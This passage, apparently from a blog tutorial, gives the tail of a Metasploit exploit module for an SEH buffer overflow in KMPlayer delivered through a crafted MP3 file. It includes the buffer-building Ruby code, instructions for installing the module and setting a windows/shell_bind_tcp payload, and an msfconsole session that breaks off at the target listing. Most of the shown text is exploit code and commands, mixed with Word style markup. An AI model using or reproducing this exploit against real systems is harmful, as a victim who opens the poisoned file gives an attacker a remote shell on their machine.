x00\x75\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA2\x00\x00\x9D\x00\x00\x00\x00\x7F\xEB\x79\x82\x00\x75\x00\x00\x00\xDF\x00\x00\x00\x00\x00\x93\x00\x00\x00\x00\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00\x00\xCA\x00\x00\x00\x00\xE5\x00\x00\xEA\xAF\x00\xFE\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4D\x00\x00\x00\x00\x00\x00\x15\x00\xB3\x00\x00\x00\xC4\x50\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x00\x00\x00\x00\x66\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x2F\x00\x10\x00\x00\x00\x00\x00\xC8\x00\x00\x00\x00\x00\x00\x00\x00\xE4\x00\x00\x00\x00\x00\x2C\x7E\x00\x00\x00\x00\x00\x00\x56\x00\x00\x00\x00\x00\x00\x6F\x00\x00\xEC\x00\x00\x00\x40\x00\x83\x57\x00\x88\x00\x00\x00\x11\x00\x81\x00\x00\x00\x00\xBC\x00\x00\x00\x00"</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>buffer = rand_text(target['Offset'])<span style="mso-tab-count: 1;"> </span>#junk</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>buffer << generate_seh_record(target.ret)</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>buffer << make_nops(30)</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>buffer << payload.encoded<span style="mso-tab-count: 1;"> </span>#1652 bytes of space</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>filecontent = header + buffer</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>print_status("Writing payload to file")</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>file_create(filecontent)</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 1;"> </span>end</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">end</span></div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;"><br />
</div><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: EN-US; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;">Copy this file in ‘exploits’ section in metasploit to include it in metasploit framework. On Backtrack5, the path is </span><span style="background: #BFBFBF; font-family: "Courier New"; font-size: 8.0pt; mso-ansi-language: EN-US; mso-bidi-language: EN-US; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-shading-themecolor: background1; mso-shading-themeshade: 191;">/pentest/exploits/framework3/modules/exploits/windows/fileformat/</span><br />
<!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style> <![endif]--> <br />
<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">Start the metasploit using <span style="background: #BFBFBF; font-family: "Courier New"; font-size: 8.0pt; mso-shading-themecolor: background1; mso-shading-themeshade: 191;">msfconsole</span> command, use this exploit, set payload as <span style="background: #BFBFBF; font-family: "Courier New"; font-size: 8.0pt; mso-shading-themecolor: background1; mso-shading-themeshade: 191;">windows/shell_bind_tcp</span> and run <span style="background: #BFBFBF; font-family: "Courier New"; font-size: 8.0pt; mso-shading-themecolor: background1; mso-shading-themeshade: 191;">exploit</span> command. This will create the malicious mp3 file which will exploit SEH overflow and will listen on a port specified in payload once it opened in KMPlayer.</div><div class="MsoNormal"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">root@bt:~# msfconsole </span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>_<span style="mso-spacerun: yes;"> </span>_<span style="mso-spacerun: yes;"> </span>_ _</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>| |<span style="mso-spacerun: yes;"> </span><span style="mso-spacerun: yes;"> </span>| |<span style="mso-spacerun: yes;"> </span>(_) |</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>_ __ ___<span style="mso-spacerun: yes;"> </span>___| |_ __ _ ___ _ __ | | ___<span style="mso-spacerun: yes;"> </span>_| |_</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">| | | | | |<span style="mso-spacerun: yes;"> </span>__/ || (_| \__ \ |_) | | (_) | | |_</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>| |</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span><span style="mso-spacerun: yes;"> </span>|_|</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>=[ metasploit v3.8.0-dev [core:3.8 api:1.0]</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">+ -- --=[ 708 exploits - 359 auxiliary - 57 post</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">+ -- --=[ 224 payloads - 27 encoders - 8 nops</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>=[ svn r13044 updated today (2011.06.28)</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">msf > use exploit/windows/fileformat/km_player_mp3_seh</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">msf exploit(km_player_mp3_seh) > show options</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">Module options (exploit/windows/fileformat/km_player_mp3_seh):</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>Name<span style="mso-spacerun: yes;"> </span>Current Setting<span style="mso-spacerun: yes;"> </span>Required<span style="mso-spacerun: yes;"> </span>Description</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>----<span style="mso-spacerun: yes;"> </span>---------------<span style="mso-spacerun: yes;"> </span>--------<span style="mso-spacerun: yes;"> </span>-----------</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-spacerun: yes;"> </span>FILENAME<span style="mso-spacerun: yes;"> </span>msf.mp3<span style="mso-spacerun: yes;"> </span>yes<span style="mso-spacerun: yes;"> </span>mp3 file</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">Exploit target:</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
